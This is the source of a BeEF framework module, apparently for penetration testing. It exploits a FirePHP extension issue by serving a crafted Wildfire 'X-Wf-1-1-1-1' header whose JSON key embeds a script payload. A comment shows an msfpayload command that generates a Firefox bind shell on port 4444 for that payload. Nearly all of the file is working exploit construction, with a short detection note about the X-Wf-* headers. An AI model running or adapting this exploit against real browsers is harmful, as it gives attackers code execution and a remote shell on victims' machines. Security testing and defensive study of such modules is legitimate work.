GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/firephp/module.rb
#
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
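# BeEF command module for the FirePHP issue described in the advisory linked
# in the file header (that advisory, not this file, is the reference for the
# affected component and versions).
#
# What the code below does:
# * pre_send builds a JSON document whose 'RequestHeaders' object ends with a
#   key made of the contents of payload.js wrapped in a script element, and
#   registers a raw HTTP response at /firephp that carries this JSON in a
#   Wildfire/FirePHP 'X-Wf-1-1-1-1' header.
# * post_execute stores the result reported back for the command.
#
# Detection note: the staged response is recognisable by its X-Wf-* response
# headers whose JSON stream contains a key holding markup rather than a
# header name.
class Firephp_code_exec < BeEF::Core::Command
  # Builds the response and mounts it on the asset handler.
  # NOTE(review): presumably called by the framework before the command is
  # dispatched - confirm against BeEF::Core::Command.
  def pre_send
    # Random token: used as the value of the crafted key and as the HTTP body.
    rand_str = rand(32**10).to_s(32)

    # load payload.js file
    # generate payload:
    #   msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
    #
    # File.read closes the handle even if reading raises; the previous
    # File.open / each_line / close sequence leaked the descriptor on error.
    # The file is embedded verbatim, so it must be operator-controlled content.
    payload = File.read("#{$root_dir}/modules/exploits/firephp/payload.js")

    # construct exploit+payload HTTP response
    # Nine filler entries ('1'..'9' => random digit) come first; insertion
    # order is preserved by Hash, so the crafted key is serialized last.
    request_headers = {}
    (1..9).each do |index|
      request_headers[index.to_s] = rand(10).to_s
    end
    request_headers["<script>#{payload}<\/SCRIPT>"] = rand_str

    exploit = { 'RequestHeaders' => request_headers }.to_json

    # Wildfire framing: "<length>|<json>|" followed by CRLF.
    # NOTE(review): String#length counts characters, not bytes - confirm which
    # one the protocol expects if payload.js can contain multi-byte characters.
    response_headers = {
      'Content-Type' => 'text/html',
      'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
      'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
      'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
      'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
    }

    # mount exploit+payload at /firephp
    # @todo use Router class instead of bind_raw()
    # NOTE(review): the trailing -1 is passed through unchanged; its meaning
    # is defined by AssetHandler#bind_raw, which is not visible here.
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
      '200',
      response_headers,
      rand_str, # HTTP body
      '/firephp', # URI mount point
      -1
    )
  end

  # Persists the value found under @datastore['result'] as this command's
  # 'result' field.
  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end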